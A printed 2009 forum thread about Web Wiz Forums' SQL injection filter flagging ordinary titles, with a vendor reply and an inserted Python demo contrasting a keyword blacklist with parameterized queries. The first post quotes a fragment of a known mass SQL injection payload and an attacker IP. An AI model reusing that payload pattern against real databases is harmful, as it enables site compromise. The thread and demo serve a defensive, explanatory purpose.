FYI on SQL Injection
Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=27177
Printed Date: 02 April 2026 at 8:34pm
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com
Topic: FYI on SQL Injection
Posted By: ohiopbx
Subject: FYI on SQL Injection
Date Posted: 26 March 2009 at 7:37pm
Afternoon, I appreciate the effort to minimize SQL injection; however, the implementation of the SQLInjection functions seems to hurt the forum more than it makes it better. I get a lot of errors because my topic titles are like "where-can-i-pick-up-a-bob-long" and the "where" is causing the issue.
I've dealt with SQL injection, and this is an example of a true SQL injection:
;DECLARE @S VARCHAR(4000);SET @S=CAST(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 AS VARCHAR(4000));EXEC(@S);-- IP: 117.193.131.212 |
Here is a link to all the injections I have tracked for one client of mine: http://johnbauctions.com/gallery/images/log/lastUpdated.txt
So I just wanted to share this.
Cody
Replies:
Posted By: Scotty32
Date Posted: 26 March 2009 at 7:59pm
Make sure you are running v9.56a, as there was a bug in V9.56 (see http://forums.webwiz.net/sql-injection-attack-warnings-after-upgrade_topic27141.html).
(Had a look at your homepage and you're on 9.56.)
------------- S2H.co.uk - WebWiz Mods and Skins: http://www.s2h.co.uk/wwf/
For support on my mods + skins, please use my forum: http://www.s2h.co.uk/forum/
Posted By: ohiopbx
Date Posted: 26 March 2009 at 8:08pm
Posted By: WebWiz-Bruce
Date Posted: 27 March 2009 at 10:30am
The SQL injection examples that you have are specific to one type of virus that was very rampant about 10 months ago. There are hundreds of different ways to do SQL injections, which is why the SQL injection test within Web Wiz Forums is more generic, to try and capture all types of SQL injection, not just the one type in the examples you have.
SQL injections are quite a complex subject. Probably somewhere in the region of 500 hours have been spent on this with Web Wiz Forums, investigating many different types of SQL injection across different database types. It's something worth looking into, as there are many hacking sites devoted to this subject which are worth checking out to make sure your own sites are fully protected against this type of vulnerability.
The issue that you have with your own forum with the false positives has been fixed with release 9.56a. The issue doesn't affect users who are using the new URL Rewrite Tool.
------------- Web Wiz Forums Hosting: https://www.webwiz.net/web-wiz-forums/forum-hosting.htm - ASP.NET Web Hosting: https://www.webwiz.net/web-hosting/windows-web-hosting.htm
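The two sides of this thread, the false positive on an ordinary title like "where-can-i-pick-up-a-bob-long" and the point that a generic keyword test is meant to catch many injection shapes, can be made concrete with a small Python demonstration. This is an added example, not code from Web Wiz Forums or from anyone in the thread: the keyword list, the sample titles and the in-memory SQLite table are all constructed assumptions, and the forum's own test is not reproduced. It shows why a word blacklist is both over-inclusive (plain English trips it) and under-inclusive (an apostrophe sails through it yet breaks concatenated SQL), and that binding the title as a query parameter stores every value literally with no keyword check at all.

```python
import re
import sqlite3

# Constructed sample titles for the demonstration (not taken from any real forum):
# the first is the shape of title the poster reports as a false positive, the
# second is ordinary English that happens to contain SQL keywords, the third
# contains an apostrophe, which a keyword filter ignores but which breaks
# concatenated SQL.
SAMPLE_TITLES = [
    "where-can-i-pick-up-a-bob-long",
    "Declare a cast of characters for the exec board",
    "Bob's paintball shop in Ohio",
]

# A naive keyword blacklist of the kind that causes the false positives described
# in the thread (this list is an assumption; Web Wiz Forums' own test is not shown).
SQL_KEYWORDS = frozenset({
    "select", "insert", "update", "delete", "drop", "union",
    "where", "declare", "cast", "exec", "varchar",
})


def naive_keyword_filter(text: str) -> bool:
    """Return True if any blacklisted word appears as a whole word in text.

    Splitting on non-alphanumerics means hyphenated titles are inspected word by
    word, so 'where-can-i-...' is flagged exactly as the poster reports.
    """
    words = re.split(r"[^a-z0-9]+", text.lower())
    return any(word in SQL_KEYWORDS for word in words)


def fresh_db() -> sqlite3.Connection:
    """In-memory table standing in for a forum's topic table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE topics (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    return conn


def store_title_concatenated(conn: sqlite3.Connection, title: str) -> bool:
    """Unsafe pattern: the title is spliced into the SQL text.

    Any quote character in the title changes the statement's structure; here
    that surfaces as a syntax error, which is how a keyword filter ends up
    being bolted on as a band-aid. Returns True on success, False on failure.
    """
    try:
        conn.execute("INSERT INTO topics (title) VALUES ('" + title + "')")
        return True
    except sqlite3.OperationalError:
        return False


def store_title_parameterized(conn: sqlite3.Connection, title: str) -> bool:
    """Safe pattern: the title is bound as a parameter and never parsed as SQL.

    Keywords, quotes and semicolons in the value are just characters, so no
    keyword filter is needed for correctness.
    """
    conn.execute("INSERT INTO topics (title) VALUES (?)", (title,))
    return True


def compare(titles=SAMPLE_TITLES) -> dict:
    """Run every title through the filter and both storage paths."""
    concat_db, param_db = fresh_db(), fresh_db()
    report = {}
    for title in titles:
        report[title] = {
            "flagged_by_filter": naive_keyword_filter(title),
            "concatenated_ok": store_title_concatenated(concat_db, title),
            "parameterized_ok": store_title_parameterized(param_db, title),
        }
    # With bound parameters every title comes back exactly as submitted.
    report["stored_literally"] = [
        row[0] for row in param_db.execute("SELECT title FROM topics ORDER BY id")
    ] == list(titles)
    return report


if __name__ == "__main__":
    for title, outcome in compare().items():
        print(f"{title!r}: {outcome}")
```

Running it shows the first two titles flagged by the blacklist even though both store fine either way, while the apostrophe title passes the filter and is the only one that fails under concatenation. The practical takeaway matches Bruce's framing: a generic keyword test is a heuristic layered over the real defense, and the real defense is that user text never becomes part of the SQL statement.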
Posted By: billd3
Date Posted: 27 March 2009 at 6:17pm
My brain hurts..
Guess I'd better download again, LOL
------------- BillD
http://theamcpages.com
http://theamcforum.com